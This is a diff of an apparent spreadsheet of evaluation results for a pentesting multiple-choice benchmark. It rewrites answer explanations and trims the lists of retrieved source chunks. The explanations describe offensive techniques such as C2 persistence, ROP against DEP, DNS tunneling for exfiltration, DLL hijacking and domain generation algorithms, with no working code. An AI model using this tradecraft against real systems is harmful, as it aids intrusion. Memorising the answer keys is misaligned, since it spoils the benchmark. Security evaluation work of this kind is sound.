+Explanation: Cobalt Strike is a commercial software used for red team operations that specializes in post-exploitation activities and establishing persistent command and control (C2) communications. This makes it highly suitable for maintaining long-term access to compromised targets within a network. Metasploit, while powerful for exploitation and initial payload delivery, is typically less focused on long-term persistence compared to Cobalt Strike. Burp Suite is primarily used for web application security testing and is not a post-exploitation framework that facilitates long-term access and provides comprehensive command and control capabilities. Wireshark is a network protocol analyzer, not a tool for establishing persistent command and control communication in red team operations.</t>
         </is>
       </c>
       <c r="G172" t="inlineStr">
@@ -11991,21 +11105,16 @@
 preemware_pentestingeval.pdf (Chunk: 140bf297-3b8f-4cda-8b62-a97281432e55, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 608f8017-318e-4a0f-9ce4-2b9b37ef7214, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I172" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J172" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K172" t="inlineStr">
         <is>
@@ -12044,7 +11153,7 @@
       <c r="F173" t="inlineStr">
         <is>
           <t>Answer: ROP chain
-Explanation: A Return-Oriented Programming (ROP) chain is an advanced technique used particularly to bypass DEP (Data Execution Prevention) mechanisms in modern operating systems. DEP prevents execution of code from a non-executable memory space, thus thwarting traditional buffer overflow attacks where attackers inject and execute their code. ROP bypasses DEP by using valid pieces of code (gadgets) already in memory (typically from loaded system libraries) to perform arbitrary computations. This is done by chaining together these gadgets to achieve the desired outcome, effectively executing arbitrary code without direct injection. Heap spray and SQL injection are not directly related to DEP bypassing, while phishing attacks are a social engineering technique unrelated to buffer overflow exploitation.</t>
+Explanation: A Return-Oriented Programming (ROP) chain is an advanced technique used particularly to bypass DEP (Data Execution Prevention) mechanisms in modern operating systems. DEP prevents execution of code from a non-executable memory space, thus thwarting traditional buffer overflow attacks where attackers inject and execute their code. ROP bypasses DEP by using valid pieces of code (gadgets) already in memory (typically from loaded system libraries) to perform arbitrary computations. This is done by chaining together these gadgets to achieve the desired outcome, effectively executing arbitrary code without direct code injection.</t>
         </is>
       </c>
       <c r="G173" t="inlineStr">
@@ -12058,21 +11167,16 @@
 preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 0407d467-a3d5-4e44-8abc-61125edf63c7, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 5bcad625-27ff-4c5d-acb6-97686598c38f, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I173" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J173" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K173" t="inlineStr">
         <is>
@@ -12111,7 +11215,7 @@
       <c r="F174" t="inlineStr">
         <is>
           <t>Answer: Using a DNS tunneling technique
-Explanation: DNS tunneling technique is most effective for maintaining long-term network access in an APT campaign targeting high profile targets such as multinational corporation's executives because it leverages DNS queries, which are less likely to raise alarms and are rarely monitored or blocked by standard security tools. This allows the attacker to maintain command and control communication covertly. Exploiting a zero-day vulnerability, while effective for initial access, does not inherently provide long-term access and can be detected and patched once discovered. Injecting malicious scripts into web forums and crafting specialized phishing emails are initial access tactics but do not directly facilitate maintaining prolonged network access without detection.</t>
+Explanation: In the context of an APT campaign targeting high profile targets such as multinational corporation's executives, using a DNS tunneling technique is most effective for maintaining long-term network access without immediate detection. This method leverages DNS queries, which are less likely to raise alarms and are rarely monitored or blocked by standard security tools. It allows the attacker to maintain command and control communication covertly. Exploiting a zero-day vulnerability, while effective for initial access, does not inherently provide long-term access and can be detected and patched once discovered. Injecting malicious scripts into web forums and crafting specialized phishing emails are initial access tactics but do not directly facilitate maintaining prolonged network access without detection.</t>
         </is>
       </c>
       <c r="G174" t="inlineStr">
@@ -12125,21 +11229,16 @@
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 91760caf-fbdc-4056-8c88-441ac7facf0c, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I174" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J174" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K174" t="inlineStr">
         <is>
@@ -12192,21 +11291,16 @@
 preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: f409a119-1bfa-4cf3-8cb8-c081f05be00d, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 3a63c30d-65d3-426b-982d-39af8b3f0d09, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I175" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J175" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K175" t="inlineStr">
         <is>
@@ -12245,7 +11339,7 @@
       <c r="F176" t="inlineStr">
         <is>
           <t>Answer: A Domain Name Service (DNS) rebinding attack
-Explanation: A DNS rebinding attack is the most effective technique for manipulating a client's interaction with their own network by exploiting trust relationships between internal systems. This type of attack changes the IP address to which a domain name points after initial trust has been established, allowing an attacker to bypass the same-origin policy and gain access to restricted networks or perform actions as the client within their internal systems. While DDoS attacks can disrupt service, they primarily flood systems with traffic to deny service rather than manipulating internal interactions. SQL injection and XSS attacks are powerful for data exfiltration and sometimes initial access but do not naturally provide persistent host-level access or directly manipulate trust relationships between internal systems.</t>
+Explanation: A Domain Name Service (DNS) rebinding attack is the correct answer as it specifically targets the way a client interacts with their own internal network by abusing the trust inherently placed in DNS responses. DNS rebinding changes the IP address to which a domain name points after initial trust has been established, allowing an attacker to bypass the same-origin policy and gain access to restricted networks or perform actions as the client within their internal systems. On the other hand, a simple DDoS attack, while disruptive, primarily floods systems with traffic to deny service, rather than manipulating internal interactions.</t>
         </is>
       </c>
       <c r="G176" t="inlineStr">
@@ -12259,21 +11353,16 @@
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 0e11e254-3f93-43ce-822e-5e1a01bd968b, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 076aff09-3415-41ea-8059-a0f52827a57d, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I176" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J176" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K176" t="inlineStr">
         <is>
@@ -12312,7 +11401,7 @@
       <c r="F177" t="inlineStr">
         <is>
           <t>Answer: Cross-site request forgery (CSRF) with synchronous AJAX without user interaction
-Explanation: CSRF involves tricking a victim into submitting a malicious request. It primarily exploits the trust that a site has in the user's browser, and while it can alter the state of a web application using the user's existing permissions, it cannot typically be used to execute arbitrary code on the server or client machine. In contrast, exploiting buffer overflows in HTTP GET requests can lead to remote code execution if the server mishandles input. XSS (Cross-Site Scripting) can allow attackers to execute scripts in the victim's browser, effectively leading to hijacking user sessions, defacing websites, or redirecting traffic.</t>
+Explanation: CSRF involves tricking a victim into submitting a malicious request. It primarily exploits the trust that a site has in the user's browser, and while it can alter the state of a web application using the user's existing permissions, it cannot typically be used to execute arbitrary code on the server or client machine. In contrast, SQL injection using time-based techniques, exploiting XSS vulnerabilities, and using an HTTP GET request to trigger buffer overflow can all lead to remote code execution in different ways.</t>
         </is>
       </c>
       <c r="G177" t="inlineStr">
@@ -12326,21 +11415,16 @@
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: d106a4a8-f9f3-4c71-a034-d800334dd5a3, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I177" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J177" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K177" t="inlineStr">
         <is>
@@ -12379,7 +11463,7 @@
       <c r="F178" t="inlineStr">
         <is>
           <t>Answer: DLL Hijacking
-Explanation: DLL Hijacking is the correct answer because it exploits the way some Windows applications search and load DLLs. If an attacker can place a malicious DLL with a matching name in a directory that is searched before the legitimate DLL directory, the application will load and execute the malicious DLL, thereby allowing the attacker to maintain persistence. Code injection, while a plausible technique, is more about enabling exploitation of known vulnerabilities rather than maintaining persistence.</t>
+Explanation: DLL Hijacking is the correct answer because it exploits the way some Windows applications search and load DLLs. If an attacker can place a malicious DLL with a matching name in a directory that is searched before the legitimate DLL directory, the application will load and execute the malicious DLL, thereby allowing the attacker to maintain persistence. Code injection, while a plausible technique, is more about executing unauthorized code rather than maintaining persistence. ARP spoofing and Man-in-the-middle attacks are primarily used for intercepting network traffic and not for maintaining persistence on a compromised system.</t>
         </is>
       </c>
       <c r="G178" t="inlineStr">
@@ -12393,21 +11477,16 @@
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 69250b66-f38a-4bf6-9f09-e3c676c2c002, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 69250b66-f38a-4bf6-9f09-e3c676c2c002, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I178" t="inlineStr">
         <is>
-          <t>Semantic: 5, Keyword: 5, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J178" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K178" t="inlineStr">
         <is>
@@ -12446,7 +11525,7 @@
       <c r="F179" t="inlineStr">
         <is>
           <t>Answer: SQL injection using time-based evasion
-Explanation: The most effective technique for exploiting a non-parameterized SQL query in a legacy web application is SQL injection using time-based evasion. This attack involves manipulating SQL queries by injecting SQL code that abuses the database query processing to either delay the response or halt it, allowing the attacker to infer information based on the time it took for the server to respond. Buffer overflow using the stack, while a serious issue, is generally related to overflow conditions in application memory space rather than direct database access specifically. Cross-site scripting (XSS) enabling cookie theft and Cross-site scripting (XSS) in stored data are primarily used for attacking users of the web application rather than the backend database itself, making SQL injection using time-based evasion the most direct and relevant choice for this scenario.</t>
+Explanation: SQL injection is the most effective technique to exploit a non-parameterized SQL query. This attack involves manipulating SQL queries by injecting SQL code that abuses the database query processing to either delay the response or halt it, allowing the attacker to infer information based on the time it took for the server to respond. Buffer overflow using the stack is related to overflow conditions in application memory space rather than database access specifically. Cross-site scripting (XSS) enabling cookie theft and Cross-site scripting (XSS) in stored data are primarily used for attacking users of the web application rather than the backend database itself, making SQL injection the most direct and relevant choice for this scenario.</t>
         </is>
       </c>
       <c r="G179" t="inlineStr">
@@ -12460,21 +11539,16 @@
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 72afb988-5c0b-4173-ac34-2220ef8a72e9, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c5ddafd2-8e53-4743-8d2a-c26ad6e16928, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 129e9036-2a16-4301-bb5f-01114fc84281, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: cb888b97-65fc-4308-b210-258c964a394e, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I179" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J179" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K179" t="inlineStr">
         <is>
@@ -12513,7 +11587,7 @@
       <c r="F180" t="inlineStr">
         <is>
           <t>Answer: Randomly generating domain names to prevent blacklisting
-Explanation: Randomly generating domain names to prevent blacklisting is a technique commonly used by malware known as Domain Generation Algorithms (DGAs). This approach helps malware maintain robust and covert communication channels with command and control servers. By generating large numbers of domain names and rapidly switching among them, DGAs make it difficult for security systems to predict or block malicious domains effectively. On the other hand, using polymorphic code primarily helps evade signature-based detection at the host level rather than network communication interference. Encrypting traffic is useful for evading content-based filters but does not prevent endpoint blacklisting. Lastly, distributing payload in multiple parts to avoid detection may be effective in some cases, but it does not directly address the issue of maintaining communication with C&amp;C servers while avoiding detection by network security mechanisms.</t>
+Explanation: Randomly generating domain names to prevent blacklisting is a technique commonly used by malware known as Domain Generation Algorithms (DGAs). This approach helps malware maintain robust and covert communication channels with command and control servers. By generating large numbers of domain names and rapidly switching among them, DGAs make it difficult for security systems to predict or block malicious domains effectively. On the other hand, using polymorphic code primarily helps evade signature-based detection at the host level rather than network communication interference. Encrypting traffic is useful for evading content-based filters but does not prevent endpoint blacklisting. Lastly, distributing payload in multiple parts to avoid detection might help with evasion but is less effective compared to DGAs in maintaining communication while avoiding detection by network security mechanisms.</t>
         </is>
       </c>
       <c r="G180" t="inlineStr">
@@ -12527,21 +11601,16 @@
 preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 04959762-acf0-4790-99fb-7524a2352b4c, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 159ad073-e6e7-46ae-a133-7467d9fc90e9, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: dfa3f47d-5ca2-4a60-aa5e-cd08e2caa4b2, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 04959762-acf0-4790-99fb-7524a2352b4c, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I180" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J180" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K180" t="inlineStr">
         <is>
@@ -12580,7 +11649,7 @@
       <c r="F181" t="inlineStr">
         <is>
           <t>Answer: DNS tunneling
-Explanation: DNS tunneling is typically the most effective technique for exfiltrating data from a network with strict egress filtering. This method leverages DNS requests, which are often allowed through network firewalls, to transfer data outside the network in an obfuscated manner. The DNS queries and responses are used to encode the data, bypassing conventional data transfer restrictions. While XSS exploitation and session hijacking are potent attacks, they primarily focus on compromising user sessions and stealing information from web applications rather than bypassing network egress filters. ARP poisoning is a technique that can disrupt network communication but does not facilitate data exfiltration in the same way as DNS tunneling.</t>
+Explanation: DNS tunneling is typically the most effective technique for exfiltrating data from a network with strict egress filtering. This method leverages DNS requests, which are often allowed through network firewalls, to transfer data outside the network in an obfuscated manner. The DNS queries and responses are used to encode the data, bypassing conventional data transfer restrictions. While XSS exploitation and session hijacking are potent attacks, they primarily focus on compromising user sessions and stealing information from web applications rather than bypassing network egress filters. ARP poisoning is a technique that can disrupt network communication but does not facilitate data exfiltration as effectively or as stealthily as DNS tunneling.</t>
         </is>
       </c>
       <c r="G181" t="inlineStr">
@@ -12594,21 +11663,16 @@
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: a13397f3-c101-493a-9eb4-6fb992844cd2, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I181" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J181" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K181" t="inlineStr">
         <is>
@@ -12647,7 +11711,7 @@
       <c r="F182" t="inlineStr">
         <is>
           <t>Answer: Padding Oracle Attack
-Explanation: The Padding Oracle Attack is the correct answer because it specifically targets the way cryptographic padding is handled within secure communication protocols. This type of attack allows an attacker to decrypt data without knowing the key by exploiting mistakes in how applications check ciphertext padding.</t>
+Explanation: A Padding Oracle Attack is a form of side channel attack where the attacker exploits implementation flaws in the padding of cryptographic messages. Specifically, the attack takes advantage of a system that leaks data about the correctness of the padding of encrypted messages, typically in web applications using CBC mode encryption without proper error messages. The attacker sends variations of the ciphertext to the server and analyzes the responses (errors, timings, etc.), which then can be used to infer the plaintext byte by byte. On the other hand, Cross-Site Scripting (XSS) and SQL Injection are attacks that target web applications by injecting malicious scripts into otherwise benign and trusted websites, which does not relate to encryption or padding flaws.</t>
         </is>
       </c>
       <c r="G182" t="inlineStr">
@@ -12661,21 +11725,16 @@
 preemware_pentestingeval.pdf (Chunk: 53d7a878-4bdf-406c-953f-62597a8f99a6, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 12e2112e-6dac-4ee5-bb17-ffc18f57f1ec, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: d97e1711-53ab-44ca-af62-a56a0d80cec8, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: d339234f-f7a5-4320-b995-1444d77980bb, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 1fef682b-fbe1-4f50-b24f-37a524926e24, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 30af0826-c4eb-444a-8c3b-d68a8930228c, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 059b3869-a244-492c-a64b-ef620b6bf3c4, Type: dense, Rank: 9)
-cowWhySo-pentest-redteam-steering.md (Chunk: d910beef-14dc-4c05-b3d9-2938a3f085fa, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d339234f-f7a5-4320-b995-1444d77980bb, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I182" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J182" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K182" t="inlineStr">
         <is>
@@ -12728,21 +11787,16 @@
 preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0e11e254-3f93-43ce-822e-5e1a01bd968b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I183" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J183" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K183" t="inlineStr">
         <is>
@@ -12786,11 +11840,11 @@
 vulnerabilities, such as SQL injection, Cross-site Scripting (XSS), and others, typically using automated tools.
 This approach is direct and efficient for this specific context. Option 1, using reverse engineering to analyze
 the payload for potential exploit vectors, while valuable for understanding and preparing for an attack, does not
-in itself identify security vulnerabilities in web applications. Choice 2, employing social engineering tactics to
